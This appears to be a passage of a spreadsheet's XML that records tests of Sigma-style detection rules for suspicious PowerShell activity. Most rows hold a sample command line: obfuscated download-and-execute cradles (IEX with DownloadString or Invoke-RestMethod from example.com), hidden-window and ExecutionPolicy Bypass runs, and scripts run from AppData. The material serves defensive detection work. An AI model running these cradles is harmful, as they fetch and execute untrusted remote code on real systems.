      <c r="E2224" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmANd "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2224" s="43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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2224" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2225" ht="15.75" customHeight="1" s="42">
      <c r="A2225" s="43" t="n"/>
      <c r="B2225" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2225" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2225" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2225" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMManD "$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2225" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2225" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775);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2225" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2225" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2226" ht="15.75" customHeight="1" s="42">
      <c r="A2226" s="43" t="n"/>
      <c r="B2226" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2226" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2226" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2226" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F2226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2226" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2226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26" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2226" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2227" ht="15.75" customHeight="1" s="42">
      <c r="A2227" s="43" t="n"/>
      <c r="B2227" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2227" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2227" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2227" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F2227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2227" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2227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27" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2227" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2228" ht="15.75" customHeight="1" s="42">
      <c r="A2228" s="43" t="n"/>
      <c r="B2228" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2228" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2228" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2228" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F2228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2228" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2228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28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2228" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2229" ht="15.75" customHeight="1" s="42">
      <c r="A2229" s="43" t="n"/>
      <c r="B2229" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2229" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2229" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2229" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F2229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2229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29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2229" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2230" ht="15.75" customHeight="1" s="42">
      <c r="A2230" s="43" t="n"/>
      <c r="B2230" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2230" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2230" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2230" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F2230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2230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30" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2230" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2231" ht="15.75" customHeight="1" s="42">
      <c r="A2231" s="43" t="n"/>
      <c r="B2231" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2231" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2231" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2231" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMANd "&amp; ( $ExecutionContext.InvokeCommand.GetCmdlet( 'Invoke-Expression' ) ) ( (New-Object Net.WebClient).DownloadString('http://example.com/test.ps1') )"</t>
        </is>
      </c>
      <c r="F2231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2231" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2231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31" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2231" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2232" ht="15.75" customHeight="1" s="42">
      <c r="A2232" s="43" t="n"/>
      <c r="B2232" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2232" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2232" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2232" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "I`EX ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F2232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2232" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2232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32" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2232" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2233" ht="15.75" customHeight="1" s="42">
      <c r="A2233" s="43" t="n"/>
      <c r="B2233" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2233" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2233" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2233" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "I`EX ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F2233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2233" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2233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33" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2233" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2234" ht="15.75" customHeight="1" s="42">
      <c r="A2234" s="43" t="n"/>
      <c r="B2234" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2234" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2234" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2234" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "I`EX ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F2234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2234" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2234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34" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2234" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2235" ht="15.75" customHeight="1" s="42">
      <c r="A2235" s="43" t="n"/>
      <c r="B2235" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2235" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2235" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2235" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX (Invoke-RestMethod -Uri 'http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2235" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2235" s="4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J2235" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2235" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2236" ht="15.75" customHeight="1" s="42">
      <c r="A2236" s="43" t="n"/>
      <c r="B2236" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2236" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2236" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2236" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "IEX (Invoke-RestMethod -Uri 'http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2236" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2236" s="4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J2236" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2236" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2237" ht="15.75" customHeight="1" s="42">
      <c r="A2237" s="43" t="n"/>
      <c r="B2237" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2237" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2237" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2237" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMaND "IEX (Invoke-RestMethod -Uri 'http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2237" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2237" s="4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J2237" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2237" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2238" ht="15.75" customHeight="1" s="42">
      <c r="A2238" s="43" t="n"/>
      <c r="B2238" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2238" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2238" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2238" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "IEX (Invoke-RestMethod -Uri 'http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2238" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2238" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2238" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2238" s="44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J2238" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2238" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2239" ht="15.75" customHeight="1" s="42">
      <c r="A2239" s="43" t="n"/>
      <c r="B2239" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2239" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2239" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2239" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmand "IEX (Invoke-RestMethod -Uri 'http://example.com/test.ps1')"</t>
        </is>
      </c>
      <c r="F2239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2239" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2239" s="43" t="inlineStr">
        <is>
          <t>PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2239" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2239" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2240" ht="15.75" customHeight="1" s="42">
      <c r="A2240" s="43" t="n"/>
      <c r="B2240" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2240" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2240" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2240" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F2240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2240" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2240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40" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2240" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2241" ht="15.75" customHeight="1" s="42">
      <c r="A2241" s="43" t="n"/>
      <c r="B2241" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2241" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2241" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2241" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F2241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2241" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2241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41" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2241" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2242" ht="15.75" customHeight="1" s="42">
      <c r="A2242" s="43" t="n"/>
      <c r="B2242" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2242" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2242" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2242" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommANd "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F2242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2242" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2242" s="43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42" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2242" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2243" ht="15.75" customHeight="1" s="42">
      <c r="A2243" s="43" t="n"/>
      <c r="B2243" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2243" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2243" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2243" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAND "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F2243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2243" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2243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43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2243" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2244" ht="15.75" customHeight="1" s="42">
      <c r="A2244" s="43" t="n"/>
      <c r="B2244" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_download_patterns</t>
        </is>
      </c>
      <c r="C2244" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern</t>
        </is>
      </c>
      <c r="D2244" s="44" t="inlineStr">
        <is>
          <t>e6c54d94-498c-4562-a37c-b469d8e9a275</t>
        </is>
      </c>
      <c r="E2244" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.com/test.ps1'))"</t>
        </is>
      </c>
      <c r="F2244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2244" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2244" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download Pattern (3b6ab547-8ec2-4991-b9d2-2b06702a48d7); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2244" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2244" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2245" ht="15.75" customHeight="1" s="42">
      <c r="A2245" s="43" t="n"/>
      <c r="B2245" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C2245" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D2245" s="44" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E2245" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F2245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2245" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2245" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2245" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2245" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2246" ht="15.75" customHeight="1" s="42">
      <c r="A2246" s="43" t="n"/>
      <c r="B2246" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parameter_variation</t>
        </is>
      </c>
      <c r="C2246" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring</t>
        </is>
      </c>
      <c r="D2246" s="44" t="inlineStr">
        <is>
          <t>36210e0d-5b19-485d-a087-c096088885f0</t>
        </is>
      </c>
      <c r="E2246" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wINdowStyle Hidden -eXEcuTiOnpOlICY Bypass -CommAnd "Write-Host 'Testing Rule Scope'"</t>
        </is>
      </c>
      <c r="F2246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2246" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2246" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2246" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2246" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2247" ht="15.75" customHeight="1" s="42">
      <c r="A2247" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2247" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C2247" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D2247" s="44" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E2247" s="44" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\cmd.exe /c  powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt</t>
        </is>
      </c>
      <c r="F2247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2247" s="43" t="n"/>
      <c r="J2247" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K2247" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2248" ht="15.75" customHeight="1" s="42">
      <c r="A2248" s="43" t="n"/>
      <c r="B2248" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C2248" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D2248" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E2248" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; 'C:\Users\Default\AppData\\Local\\payload.ps1'\"</t>
        </is>
      </c>
      <c r="F2248" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2248" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2248" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2248" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); PowerShell Script Run in AppData (ac175779-025a-4f12-98b0-acdaeb77ea85)</t>
        </is>
      </c>
      <c r="J2248" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2248" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2249" ht="15.75" customHeight="1" s="42">
      <c r="A2249" s="43" t="n"/>
      <c r="B2249" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C2249" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D2249" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E2249" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; 'C:\Users\Default\AppData\\Local\\payload.ps1'\"</t>
        </is>
      </c>
      <c r="F2249" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2249" s="43" t="inlineStr">
        <is>
          <t>Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); Suspicious Program Names (efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6); PowerShell Script Run in AppData (ac175779-025a-4f12-98b0-acdaeb77ea85)</t>
        </is>
      </c>
      <c r="J2249" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2249" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2250" ht="15.75" customHeight="1" s="42">
      <c r="A2250" s="43" t="n"/>
      <c r="B2250" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_appdata</t>
        </is>
      </c>
      <c r="C2250" s="44" t="inlineStr">
        <is>
          <t>PowerShell Script Run in AppData</t>
        </is>
      </c>
      <c r="D2250" s="44" t="inlineStr">
        <is>
          <t>ac175779-025a-4f12-98b0-acdaeb77ea85</t>
        </is>
      </c>
      <c r="E2250" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Invoke-Expression (Get-Content $env:APPDATA\script.ps1 -Raw)}"</t>
        </is>
      </c>
      <c r="F2250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2250" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2250" s="44" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2); Powershell Inline Execution From A File (ee218c12-627a-4d27-9e30-d6fb2fe22ed2)</t>
        </is>
